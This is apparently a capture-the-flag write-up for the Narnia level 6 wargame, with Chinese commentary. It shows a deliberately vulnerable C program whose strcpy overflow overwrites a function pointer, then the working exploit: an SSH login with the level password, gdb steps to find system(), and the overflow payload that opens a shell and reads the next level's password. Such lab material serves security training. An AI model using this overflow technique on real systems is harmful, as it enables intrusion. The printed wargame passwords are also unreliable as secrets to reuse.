/** narnia6.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern char **environ;
// tired of fixing values...
// - morla
unsigned long get_sp(void) {
__asm__("movl %esp,%eax\n\t"
"and $0xff000000, %eax"
);
}
int main(int argc, char *argv[])
{
char b1[8], b2[8];
int (*fp)(char *)=(int(*)(char *))&puts, i;
if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }
/* clear environ */
for(i=0; environ[i] != NULL; i++)
memset(environ[i], '\0', strlen(environ[i]));
/* clear argz */
for(i=3; argv[i] != NULL; i++)
memset(argv[i], '\0', strlen(argv[i]));
strcpy(b1,argv[1]);
strcpy(b2,argv[2]);
//if(((unsigned long)fp & 0xff000000) == 0xff000000)
if(((unsigned long)fp & 0xff000000) == get_sp())
exit(-1);
fp(b1);
exit(1);
}
fp本来初始化为puts函数的
要用system的地址替换,首先得找到system函数的地址, 可以通过gdb 的 p system命令获取system函数的地址
再把b1设置成 /bin/sh
那最终调用fp(b1) 就变成了 调用 system("/bin/sh");
root@today:~# ssh narnia6@178.79.134.250
narnia6@178.79.134.250's password: neezocaeng
narnia6@melinda:~$ cd /narnia
narnia6@melinda:/narnia$ gdb -tui narnia6
(gdb) b main
(gdb) run `python -c 'print "AAAAAAAA\xff\xff\xff\xff"'` `python -c 'print "AAAAAAAA/bin/sh"'`
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e63cd0 <system>
narnia6@melinda:/narnia$ ./narnia6 `python -c 'print "AAAAAAAA\xd0\x3c\xe6\xf7"'` `python -c 'print "AAAAAAAA/bin/sh"'`
$ whoami
narnia7
$ cat /etc/narnia_pass/narnia7
ahkiaziphu
$
参考1: http://blog.csdn.net/linyt/article/details/43643499